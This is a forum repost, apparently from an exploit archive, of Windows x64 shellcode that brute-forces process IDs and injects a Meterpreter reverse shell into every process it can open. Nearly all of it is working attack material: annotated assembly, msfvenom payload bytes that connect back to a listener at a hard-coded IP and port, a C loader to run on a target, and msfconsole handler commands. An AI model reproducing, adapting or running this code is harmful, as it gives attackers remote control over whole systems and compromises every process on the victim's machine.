Windows/x64 Inject All Processes With Meterpreter Reverse Shell Shellcode

#179
Topic created · 1 Posts · 0 Views
  • 655 bytes small 64-bit Windows 10 shellcode that injects all processes with Meterpreter reverse shells.
    MD5 | 75a126bd35170b68365261ae4f904c66
    Download

    # Shellcode Title:  Windows/x64 - Inject All Processes with Meterpreter Reverse Shell (655 Bytes)  
    # Shellcode Author: Bobby Cooke (boku)  
    # Date:             May 1st, 2021  
    # Tested on:        Windows 10 v2004 (x64)  
    # Compiled from:    Kali Linux (x86_64)  
    # Shellcode Description:  
    #   64bit Windows 10 shellcode that injects all processes with Meterpreter reverse shells. The shellcode first resolves the base address of   
    #   kernel32.dll dynamically in memory via the Intel GS Register & host processes Process Environment Block (PEB). Then resolves the addresses   
    #   for the OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread APIs via kernel32.dll's Export Table.  
    #   Once all API's are resolved the shellcode then attempts to open a handle to other processes using the OpenProcess API via bruteforcing the PIDs.  
    #   When a handle to a remote process is returned, the shellcode then attempts to allocate writable & executable memory in the remote process using the   
    #   VirtualAllocEx API. If successful, the shellcode will then use the WriteProcessMemory API to write the Meterpreter shellcode into the memory of the   
    #   remote process. To this point, if everything has returned sucessful, then the CreateRemoteThread API will be executed to create a thread in the remote  
    #   process that will run the Meterpreter shell within that remote process. The shellcode then continues to bruteforce through more PIDs to launch more  
    #   Meterpreter shells.   
    ; Compile & get shellcode from Kali:  
    ;   nasm -f win64 x64win-InjectAllProcMeterpreterRevSh.asm -o x64win-InjectAllProcMeterpreterRevSh.o  
    ;   for i in $(objdump -D x64win-InjectAllProcMeterpreterRevSh.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done  
    ; Get kernel32.dll base address  
    xor rdi, rdi            ; RDI = 0x0  
    mul rdi                 ; RAX&RDX =0x0  
    mov rbx, gs:[rax+0x60]  ; RBX = Address_of_PEB  
    mov rbx, [rbx+0x18]     ; RBX = Address_of_LDR  
    mov rbx, [rbx+0x20]     ; RBX = 1st entry in InitOrderModuleList / ntdll.dll  
    mov rbx, [rbx]          ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll  
    mov rbx, [rbx]          ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll  
    mov rbx, [rbx+0x20]     ; RBX = &kernel32.dll ( Base Address of kernel32.dll)  
    mov r8, rbx             ; RBX & R8 = &kernel32.dll  
    ; Get kernel32.dll ExportTable Address  
    mov ebx, [rbx+0x3C]     ; RBX = Offset NewEXEHeader  
    add rbx, r8             ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader  
    xor rcx, rcx            ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add  
    add cx, 0x88ff  
    shr rcx, 0x8            ; RCX = 0x88ff --> 0x88  
    mov edx, [rbx+rcx]      ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable  
    add rdx, r8             ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable  
    ; Get Number of Functions in Kernel32.dll ExportTable  
    xor r9, r9   
    mov r9d, [rdx+0x14]     ; R9 = Number of Functions Kernel32.dll ExportTable  
    ; Get &AddressTable from Kernel32.dll ExportTable  
    xor r10, r10  
    mov r10d, [rdx+0x1C]    ; RDI = RVA AddressTable  
    add r10, r8             ; R10 = &AddressTable  
    ; Get &NamePointerTable from Kernel32.dll ExportTable  
    xor r11, r11  
    mov r11d, [rdx+0x20]    ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable  
    add r11, r8             ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)  
    ; Get &OrdinalTable from Kernel32.dll ExportTable  
    xor r12, r12  
    mov r12d, [rdx+0x24]    ; R12 = RVA  OrdinalTable  
    add r12, r8             ; R12 = &OrdinalTable  
    jmp short apis  
    ; Get the address of the API from the Kernel32.dll ExportTable  
    getapiaddr:  
    pop rbx                 ; save the return address for ret 2 caller after API address is found  
    pop rcx                 ; Get the string length counter from stack  
    xor rax, rax            ; Setup Counter for resolving the API Address after finding the name string  
    mov rdx, rsp            ; RDX = Address of API Name String to match on the Stack   
    push rcx                ; push the string length counter to stack  
    loop:  
    mov rcx, [rsp]          ; reset the string length counter from the stack  
    xor rdi,rdi             ; Clear RDI for setting up string name retrieval  
    mov edi, [r11+rax*4]    ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]  
    add rdi, r8             ; RDI = &NameString    = RVA NameString + &kernel32.dll  
    mov rsi, rdx            ; RSI = Address of API Name String to match on the Stack  (reset to start of string)  
    repe cmpsb              ; Compare strings at RDI & RSI  
    je resolveaddr          ; If match then we found the API string. Now we need to find the Address of the API   
    incloop:  
    inc rax  
    cmp rax, r9             ; Have we exhausted all APIs in the Export Table?  
    jne loop  
    ; Find the address of GetProcAddress by using the last value of the Counter  
    resolveaddr:  
    pop rcx                 ; remove string length counter from top of stack  
    mov ax, [r12+rax*2]     ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.<API>  
    mov eax, [r10+rax*4]    ; RAX = RVA API = [&AddressTable + API OrdinalNumber]  
    add rax, r8             ; RAX = Kernel32.<API> = RVA kernel32.<API> + kernel32.dll BaseAddress  
    push rbx                ; place the return address from the api string call back on the top of the stack  
    ret                     ; return to API caller  
    apis:                   ; API Names to resolve addresses  
    ; OpenProcess | String length : 11  
    xor rcx, rcx  
    add cl, 0xC                 ; String length for compare string 11(0xB)+NullByte = 0xC  
    xor rax, rax  
    add rax, 0x737365FF         ; sse,0xFF : 737365FF  
    shr rax, 0x8                ; sse,0xFF --> 0x00,sse   
    push rax  
    mov rax, 0x636f72506e65704f ; corPnepO : 636f72506e65704f  
    push rax  
    push rcx                    ; push the string length counter to stack  
    call getapiaddr             ; Get the address of the API from Kerenl32.dll ExportTable  
    mov r13, rax                ; R13 = &OpenProcess  
    ; VirtualAllocEx | String length : 14  
    xor rcx, rcx  
    add cl, 0xF                 ; String length for compare string 14(0xE)+NullByte = 0xF  
    mov rax, 0x7845636F6C6CFFFF ; xEcoll,0xFFFF : 7845636f6c6cFFFF  
    shr rax, 0x10               ; xEcoll,0xFFFF --> 0x0000,xEcoll  
    push rax  
    mov rax, 0x416c617574726956 ; AlautriV : 416c617574726956  
    push rax  
    push rcx                    ; push the string length counter to stack  
    call getapiaddr             ; Get the address of the API from Kerenl32.dll ExportTable  
    mov r14, rax                ; R14 = &VirtualAllocEx  
    ; WriteProcessMemory | String length : 18  
    xor rcx, rcx  
    push rcx  
    add cl, 0x9                 ; String length for compare string  
    mov rax, 0x6f6d654d73736563 ; omeMssec : 6f6d654d73736563  
    push rax  
    mov rax, 0x6f72506574697257 ; orPetirW : 6f72506574697257  
    push rax  
    push rcx                    ; push the string length counter to stack  
    call getapiaddr             ; Get the address of the API from Kerenl32.dll ExportTable  
    mov r15, rax                ; R15 = &WriteProcessMemory   
    ; CreateRemoteThread | String length : 18  
    xor rcx, rcx  
    push rcx  
    add cl, 0x7                 ; String length for compare string   
    mov rax, 0x6552657461657243 ; eRetaerC : 6552657461657243  
    push rax  
    push rcx                    ; push the string length counter to stack  
    call getapiaddr             ; Get the address of the API from Kerenl32.dll ExportTable  
    mov r12, rax                ; R12 = &CreateRemoteThread   
    ; R11 = Handle Counter | R12 = &CreateRemoteThread | R13 = &OpenProcess | R14 = &VirtualAllocEx | R15 = &WriteProcessMemory  
    save2stack:  
    push r12  
    push r13  
    push r14  
    push r15  
    jmp short loopinit  
    getAddrFromStack:  
    pop rcx             ; pop ret address  
    pop r11  
    mov r15, [rsp]  
    mov r14, [rsp+0x8]  
    mov r13, [rsp+0x10]  
    mov r12, [rsp+0x18]  
    push rcx  
    ret  
    loopinit:  
    xor r11, r11  
    add r11, 0xFA0 ; PID-1 - Start at PID 4000  
    hprocloop:  
    inc r11     ; Increment the PID Loop counter by 1 and try to open another handle  
    push r11  
    ; hProc = OpenProcess(PROCESS_ALL_ACCESS, false, i);  
    ;        HANDLE OpenProcess(           
    ;         DWORD dwDesiredAccess,   =>  RCX = 0x1FFFFF = PROCESS_ALL_ACCESS  
    ;         BOOL bInheritHandle,     =>  RDX = 0x0 = false  
    ;         DWORD dwProcessId        =>  R8  = ProcessID (PID of target process to inject too)  
    ; );  
    sub rsp, 0x40         ; Allocate 0x28 (40) bytes on the stack  
    xor rcx, rcx  
    add rcx, 0x1FFFFFFF ; RCX = 0x1FFFFFFF  
    shr rcx, 0x8        ; RCX = 0x1FFFFFFF --> 0x001FFFFF = PROCESS_ALL_ACCESS  
    xor rdx, rdx        ; RDX = 0x0 = false  
    xor r8,r8  
    mov r8, r11         ; R8  = ProcessID (PID of target process to inject too)  
    call r13            ; RAX will return the Process Handle for the opened remote process  
    add rsp, 0x40       ; clean up stack  
    call getAddrFromStack ; reset API addresses in registers  
    xor rdx, rdx        ; RDX = Returned Null? (Could not Open a handle to remote process)  
    cmp rax, rdx  
    je hprocloop        ; Failed to get a handle to remote process, increment ProcessID by 1 and try again  
    push r11            ; push counter to stack to avoid clobber  
    push rax            ; Save hProcess handle to stack - R10 & RAX & RCX get clobbered by VirtualAllocEx()  
    ; remoteProcAddr = VirtualAllocEx(hProc, 0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);  
    ; LPVOID VirtualAllocEx(  
    ;        HANDLE hProcess,          => RCX = Process Handle returned from OpenProcess()  
    ;        LPVOID lpAddress,         => RDX = 0x0 - Will allow kernel to allocate the dest memory addr in remote process  
    ;        SIZE_T dwSize,            => R8  = 0x1000 - Memory size to allocate  
    ;        DWORD flAllocationType,   => R9  = 0x3000 => MEM_RESERVE  
    ;        DWORD flProtect           => [RSP+0x20] = 0x40 => PAGE_EXECUTE_READWRITE - Makes the memory buffer in remote process Read&Write&Executable (Required for DEP)  
    ; );  
    sub rsp, 0x40         ; Allocate 0x28 (40) bytes on the stack  
    mov rcx, rax         ; RCX = HANDLE hProcess  
    xor rdx, rdx         ; RDX = 0x0 = lpAddress  
    xor r8, r8    
    xor rbx, rbx  
    add bx, 0x10FF  
    shr rbx, 0x8         ; 0x10FF --> 0x10  
    shl rbx, 0x8         ; 0x10   --> 0x1000  
    add r8, rbx          ; R8 = dwSize  
    xor r9, r9  
    xor rbx, rbx  
    add bx, 0x30FF  
    shr rbx, 0x8         ; 0x30FF --> 0x30  
    shl rbx, 0x8         ; 0x30   --> 0x3000  
    add r9, rbx          ; R9 = flAllocationType  
    xor rbx, rbx  
    add bx, 0x40FF  
    shr rbx, 0x8         ; 0x40FF --> 0x40  
    mov [rsp+0x20], rbx  ; [RSP=0x20] = flProtect  
    call r14             ; If success, RAX = Address of allocated memory in remote process  
    add rsp, 0x40        ; clean up stack  
    pop r10              ; get open handle to remote process from stack  
    call getAddrFromStack ; reset API addresses in registers  
    xor rdx, rdx         ; RDX = Returned Null? (Could allocate memory in remote process)  
    cmp rax, rdx  
    je hprocloop         ; Failed to allocate memory in remote process, increment ProcessID by 1 and try again  
    push r11  
    push rax             ; Save remoteProcAddr to stack  
    push r10             ; Save hProcess handle to stack - R10 & RAX & RCX get clobbered by VirtualAllocEx()  
    ; n = WriteProcessMemory(hProc, remoteProcAddr, payload, payload_len, NULL);  
    ; BOOL WriteProcessMemory(  
    ;        HANDLE hProcess,                  => RCX = Process Handle returned from OpenProcess()  
    ;        LPVOID lpBaseAddress,             => RDX = Memory address in remote process returned from VirtualAllocEx()  
    ;        LPCVOID lpBuffer,                 => R8  = Memory address in host process of the shellcode that will be injected into remote process   
    ;        SIZE_T nSize,                     => R9  = 0x1000 - Memory size to allocate  
    ;        SIZE_T *lpNumberOfBytesWritten    => [RSP+0x20] = 0x0 - Have to place 5th+ values on stack. Need to leave 32 bytes for "Shadow Space" 0x20=32bytes  
    ; );  
    sub rsp, 0x40         ; Allocate 0x28 (40) bytes on the stack  
    mov rcx, r10         ; RCX = HANDLE hProcess  
    mov rdx, rax         ; RDX = lpBaseAddress  
    jmp short callPayload  
    popPayload:  
    pop r8 ; r8 = local shellcode payload address  
    xor rbx, rbx  
    add bx, 0x10FF  
    shr rbx, 0x8         ; 0x10FF --> 0x10  
    shl rbx, 0x8         ; 0x10   --> 0x1000  
    mov r9, rbx          ; R9 = nSize  
    xor rbx, rbx  
    mov [rsp+0x20], rbx  ; [RSP=0x20] = *lpNumberOfBytesWritten  
    call r15             ; if success will return True (1) else False (0) = fail  
    add rsp, 0x40        ; clean up stack  
    pop r10              ; get Process Handle from stack  
    pop r9               ; R9 = remoteProcAddr  
    call getAddrFromStack ; reset API addresses in registers  
    xor rdx, rdx        ; RDX = Returned Null? (Could write memory in remote process)  
    cmp rax, rdx  
    je hprocloop        ; Failed to write memory in remote process, increment ProcessID by 1 and try again  
    ; CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)remoteProcAddr, NULL, NULL, NULL);  
    ; HANDLE CreateRemoteThread(  
    ;        HANDLE hProcess,                          => RCX = Process Handle returned from OpenProcess()  
    ;        LPSECURITY_ATTRIBUTES lpThreadAttributes, => RDX = 0x0  
    ;        SIZE_T dwStackSize,                       => R8  = 0x0  
    ;        LPTHREAD_START_ROUTINE lpStartAddress,    => R9  = remoteProcAddr    
    ;        LPVOID lpParameter,                       => [RSP+0x20] = 0x0  
    ;        DWORD dwCreationFlags,                    => [RSP+0x28] = 0x0  
    ;        LPDWORD lpThreadId                        => [RSP+0x30] = 0x0  
    ; );  
    push r11  
    sub rsp, 0x40         ; Allocate 0x28 (40) bytes on the stack  
    mov rcx, r10       ; RCX = HANDLE hProcess  
    xor rdx, rdx       ; RDX = lpThreadAttributes  
    xor r8, r8         ; R8  = dwStackSize  
    ; R9  = remoteProcAddr  
    mov [rsp+0x20], r8 ; lpParameter  
    mov [rsp+0x28], r8 ; dwCreationFlag  
    mov [rsp+0x30], r8 ; lpThreadId  
    call r12           ; Call CreateRemoteThread()  
    add rsp, 0x40      ; clean up stack  
    call getAddrFromStack ; reset API addresses in registers  
    xor rax,rax  
    xor rdx,rdx  
    je hprocloop       ; Do the process injection again on more processes  
    callPayload:  
    call popPayload  
    ; nopsled  
    db  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90  
    payload:  
    ; msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.170.129 LPORT=1337 EXITFUNC=thread -f csharp  
    ; Payload size: 511 bytes  
    db  0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,\  
    0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,\  
    0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,\  
    0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,\  
    0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,\  
    0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,\  
    0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x8b,0x48,\  
    0x18,0x50,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x4d,0x31,0xc9,0x48,\  
    0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9,\  
    0x0d,0xac,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,\  
    0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,\  
    0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x41,0x58,\  
    0x41,0x58,0x5e,0x59,0x48,0x01,0xd0,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,\  
    0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,\  
    0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,\  
    0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,\  
    0x49,0xbc,0x02,0x00,0x05,0x39,0xc0,0xa8,0xaa,0x81,0x41,0x54,0x49,0x89,0xe4,\  
    0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,\  
    0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,\  
    0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,\  
    0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,\  
    0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,\  
    0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,\  
    0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,\  
    0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,\  
    0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,\  
    0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,\  
    0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,\  
    0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,\  
    0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,\  
    0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,\  
    0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,\  
    0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,\  
    0xff,0xe7,0x58,0x6a,0x00,0x59,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0x89,0xda,0xff,\  
    0xd5  
    ; nopsled  
    db  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90  
    ###############################################################################################################  
    // shellcode-CppRunner.c  
    // Cross-Compiled from x64 Kali with mingw  
    // x86_64-w64-mingw32-gcc shellcode-cppRunner.c -o shellcode-cppRunner.exe  
    // ^ Now transfer the EXE to the target windows host, execute it, and  have this shellcode runner do its thing for a demo  
    // - Make sure to start the multi/handler on your MSFConsole to catch the meterpreter reverse shells  
    //   msfconsole; msf6 > use multi/handler; msf6 > set payload windows/x64/meterpreter/reverse_tcp; msf6 > set lhost 192.168.170.129; msf6 > set lport 1337; run  
    //   ^ Replace the msfvenom code below, and mod the msfconsole commands to your lhost and lport & mod payload_len var below if your met shell in not == 511 bytes  
    #include <windows.h>  
    #include <stdlib.h>  
    unsigned char scode[] =  
    // The Process injector shellcode that dynamically resolves the APIs and injects all processes on the target that it can get a handle too  
    "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x48\x31"  
    "\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xc9\x44\x8b\x4a\x14\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2\x4d\x31\xdb\x44\x8b\x5a\x20"  
    "\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x35\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89"  
    "\xd6\xf3\xa6\x74\x08\x48\xff\xc0\x4c\x39\xc8\x75\xe3\x59\x66\x41\x8b\x04\x44\x41\x8b\x04\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x0c\x48\x31\xc0\x48\x05\xff"  
    "\x65\x73\x73\x48\xc1\xe8\x08\x50\x48\xb8\x4f\x70\x65\x6e\x50\x72\x6f\x63\x50\x51\xe8\xa6\xff\xff\xff\x49\x89\xc5\x48\x31\xc9\x80\xc1\x0f\x48\xb8\xff\xff\x6c\x6c"  
    "\x6f\x63\x45\x78\x48\xc1\xe8\x10\x50\x48\xb8\x56\x69\x72\x74\x75\x61\x6c\x41\x50\x51\xe8\x7d\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x51\x80\xc1\x09\x48\xb8\x63\x65"  
    "\x73\x73\x4d\x65\x6d\x6f\x50\x48\xb8\x57\x72\x69\x74\x65\x50\x72\x6f\x50\x51\xe8\x57\xff\xff\xff\x49\x89\xc7\x48\x31\xc9\x51\x80\xc1\x07\x48\xb8\x43\x72\x65\x61"  
    "\x74\x65\x52\x65\x50\x51\xe8\x3c\xff\xff\xff\x49\x89\xc4\x41\x54\x41\x55\x41\x56\x41\x57\xeb\x18\x59\x41\x5b\x4c\x8b\x3c\x24\x4c\x8b\x74\x24\x08\x4c\x8b\x6c\x24"  
    "\x10\x4c\x8b\x64\x24\x18\x51\xc3\x4d\x31\xdb\x49\x81\xc3\xa0\x0f\x00\x00\x49\xff\xc3\x41\x53\x48\x83\xec\x40\x48\x31\xc9\x48\x81\xc1\xff\xff\xff\x1f\x48\xc1\xe9"  
    "\x08\x48\x31\xd2\x4d\x31\xc0\x4d\x89\xd8\x41\xff\xd5\x48\x83\xc4\x40\xe8\xb2\xff\xff\xff\x48\x31\xd2\x48\x39\xd0\x74\xcc\x41\x53\x50\x48\x83\xec\x40\x48\x89\xc1"  
    "\x48\x31\xd2\x4d\x31\xc0\x48\x31\xdb\x66\x81\xc3\xff\x10\x48\xc1\xeb\x08\x48\xc1\xe3\x08\x49\x01\xd8\x4d\x31\xc9\x48\x31\xdb\x66\x81\xc3\xff\x30\x48\xc1\xeb\x08"  
    "\x48\xc1\xe3\x08\x49\x01\xd9\x48\x31\xdb\x66\x81\xc3\xff\x40\x48\xc1\xeb\x08\x48\x89\x5c\x24\x20\x41\xff\xd6\x48\x83\xc4\x40\x41\x5a\xe8\x52\xff\xff\xff\x48\x31"  
    "\xd2\x48\x39\xd0\x0f\x84\x68\xff\xff\xff\x41\x53\x50\x41\x52\x48\x83\xec\x40\x4c\x89\xd1\x48\x89\xc2\xeb\x6f\x41\x58\x48\x31\xdb\x66\x81\xc3\xff\x10\x48\xc1\xeb"  
    "\x08\x48\xc1\xe3\x08\x49\x89\xd9\x48\x31\xdb\x48\x89\x5c\x24\x20\x41\xff\xd7\x48\x83\xc4\x40\x41\x5a\x41\x59\xe8\x08\xff\xff\xff\x48\x31\xd2\x48\x39\xd0\x0f\x84"  
    "\x1e\xff\xff\xff\x41\x53\x48\x83\xec\x40\x4c\x89\xd1\x48\x31\xd2\x4d\x31\xc0\x4c\x89\x44\x24\x20\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\x41\xff\xd4\x48\x83\xc4"  
    "\x40\xe8\xd2\xfe\xff\xff\x48\x31\xc0\x48\x31\xd2\x0f\x84\xe8\xfe\xff\xff\xe8\x8c\xff\xff\xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
    // To inject all processes on the target running this shellcode with your own Meterpreter Reverse shell (with your own IP), use msfvenom and replace below  
    // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.170.129 LPORT=1337 EXITFUNC=thread -f c  
    "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a"  
    "\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18"  
    "\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x8b\x48\x18\x50\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x4d\x31\xc9\x48\xff"  
    "\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01"  
    "\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x41\x58\x41\x58\x5e\x59\x48\x01\xd0\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff"  
    "\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5\x49"  
    "\xbc\x02\x00\x05\x39\xc0\xa8\xaa\x81\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00"  
    "\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41"  
    "\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a"  
    "\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2"  
    "\x48\x31\xc9\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"  
    "\x7d\x28\x58\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c\xff"  
    "\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\xbb\xe0\x1d\x2a\x0a\x41\x89\xda\xff\xd5\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
    "\x90\x90\x90\x90\x90\x90";  
    unsigned int payload_len = 1166;  
    int main(int argc, char** argv)  
    {  
    DWORD oldprotect = 0;  
    void* exec = VirtualAlloc(0, payload_len, MEM_COMMIT, PAGE_READWRITE);  
    memcpy(exec, scode, payload_len);  
    auto vp = VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect);  
    ((void(*)())exec)();  
    }  
    

    Source: packetstormsecurity.com

Log in to reply